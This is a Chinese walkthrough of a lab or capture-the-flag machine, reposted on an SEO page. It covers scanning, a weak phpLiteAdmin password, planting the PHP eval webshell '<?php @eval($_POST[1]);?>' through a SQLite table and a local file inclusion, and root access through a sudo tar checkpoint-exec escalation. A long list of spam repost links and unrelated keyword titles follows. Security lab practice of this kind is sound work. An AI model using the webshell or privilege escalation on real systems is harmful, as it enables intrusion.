当前位置: 首页 > wzjs >正文

门户网站的基本功能海口网站建设王道下拉棒

门户网站的基本功能,海口网站建设王道下拉棒,宁波网站建设价格合理,深圳货拉拉一、信息收集 1、主机发现 arp-scan -l 2、端口扫描 nmap -sS -sV 192.168.66.144 nmap -p- -Pn -sC -sV -n 192.168.66.144 whatweb -v 192.168.66.144 这里开放了3个端口,先80端口拿去目录,然后测试下22端口有没有什么未授权之类的,然后…

一、信息收集

1、主机发现

arp-scan -l

2、端口扫描

nmap -sS -sV 192.168.66.144 nmap -p- -Pn -sC -sV -n 192.168.66.144 whatweb -v 192.168.66.144

这里开放了3个端口,先80端口拿去目录,然后测试下22端口有没有什么未授权之类的,然后111端口这个服务去查询一下是什么情况。还有一个55113端口的tcp

22/tcp    open  ssh     OpenSSH 5.9p1 
80/tcp    open  http    Apache httpd 2.2.22 ((Ubuntu))111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          40121/udp6  status
|   100024  1          41218/tcp6  status
|   100024  1          52754/udp   status
|_  100024  1          55113/tcp   status
55113/tcp open  status  1 (RPC #100024)

3、目录扫描

dirsearch -u http://192.168.66.144:80/ -e * -i 200 dirb http://192.168.66.144

访问一下目录

4、外网打点

Ⅰ、80端口

访问了一个adbadmin页面,看着像缓冲区溢出,在看其他,这里还是爆破一下吧,然后只能看看其他端口了

这里弱口令密码是admin,进来看到这样一个管理员后台,然后我们找一下历史漏洞。

这里有一个远程命令执行,我们看看是什么情况。

其实我后面的都做偏了,这里有账号密码的,但我不熟悉这个东西,md5解密后ssh也无法连接到

Ⅱ、LFI+数据库漏洞
CREATE TABLE 'a' ('data' TEXT default '<?php @eval($_POST[1]);?>')

这里可以看到存储的地址

不过这里不能直接访问

结合这里有个LFI漏洞,估计是结合这个去拿shell 首先登陆SqliteAdmin创建数据库test.php

若在sqliteadmin没有test.php,则此时会在当前目录下生成test.php

这里我们创建一个表格
CREATE TABLE 'test1'('s');插入一句话木马
INSERT INTO "test1" ("s") VALUES ("'<?php @eval($_POST[1]);?>'")

结合之前的LFI漏洞去访问执行

访问该php文件

这样蚁剑就连接成功了

这里可以看到账号密码,尝试连接一下

Ⅲ、拿shell

这里拿账号密码登录就可以了

这里有两个sudo权限执行文件,去看看有什么提权方法

Ⅳ、提权

提权成功 sudo -u root tar cf /dev/null exploit --checkpoint=1 --checkpoint-action=exec="/bin/bash"


文章转载自:

http://sjtXBD7z.kwqqs.cn
http://lPwHOjsp.kwqqs.cn
http://2BaaRCmW.kwqqs.cn
http://5Sl40X6I.kwqqs.cn
http://tVpS3ZJj.kwqqs.cn
http://V2CO03Ze.kwqqs.cn
http://02n3Dzyg.kwqqs.cn
http://oJMk7EEz.kwqqs.cn
http://gNO3rgLf.kwqqs.cn
http://5Did1S8w.kwqqs.cn
http://Gr49mcyI.kwqqs.cn
http://4BqvXcsN.kwqqs.cn
http://x3s4DRkc.kwqqs.cn
http://j98kg5yn.kwqqs.cn
http://xpoEhT4m.kwqqs.cn
http://ohUjTTU2.kwqqs.cn
http://0zWH1tBQ.kwqqs.cn
http://PBg0kAVd.kwqqs.cn
http://HLGHMT14.kwqqs.cn
http://YeGf4Puz.kwqqs.cn
http://QILNuiN6.kwqqs.cn
http://TvE3akG2.kwqqs.cn
http://L6rByPdz.kwqqs.cn
http://icv9e8Gp.kwqqs.cn
http://aWUkqSfD.kwqqs.cn
http://8ivEBLdM.kwqqs.cn
http://u81i3sYP.kwqqs.cn
http://WkeWHUVP.kwqqs.cn
http://UPfP6YTQ.kwqqs.cn
http://luJ3fhPa.kwqqs.cn
http://www.dtcms.com/wzjs/776821.html

相关文章:

  • 给公司做一个网站吗合肥优化排名推广
  • 外贸网站图片素材昆明seo代理商
  • php构建网站大企业网站建设公司
  • 软装设计师培训中心seo搜索引擎优化总结报告
  • 商务网站建设总结中国移动app免费下载安装
  • 企业网站搜索引擎推广方法企业为什么交税
  • wordpress 插件全部消失网站怎么做才能得到更好的优化
  • 国外学校网站模板东莞定制建站网站推广公司
  • wordpress网站的跳出率很低个人简历电子版免费下载
  • 福田网站制作比较好的成都 网站 建设
  • 怎么把asp网站改成php成都做一个中小企业网站需要多少钱
  • 腾讯域名注册网站安徽百度seo公司
  • 做泵阀生意到哪个网站东莞华为外包公司
  • 移动网站建设方案文艺范wordpress主题
  • 手机模板网站制作物联网系统开发
  • 龙岗平湖网站开发做期货财经网站需要哪些资质
  • 光电网站设计叮当设计官网
  • 无锡网站制作启东莞网络推广代理
  • 网站源码韶关营销型网站建设
  • 网站建设的三个步骤是什么青海企业网站建设
  • 免费建立网站论坛坪山附近网站建设
  • 太和网站开发招聘超级外链推广
  • 域名对网站排名的影响有没有可以做游戏的网站
  • 培训收费网站建设阜阳做网站的公司
  • 洛阳市建设厅网站百度新闻排行榜
  • 网站外链建设的策略分析所有网站都能进的浏览器
  • 河南城乡建设厅网站wordpress屏蔽外国ip
  • 网站建设要做哪些工作室最好的购物网站
  • 网站建设优化东莞网站背景音乐怎么做
  • 网站公司云建站怎么样抖音推广项目计划书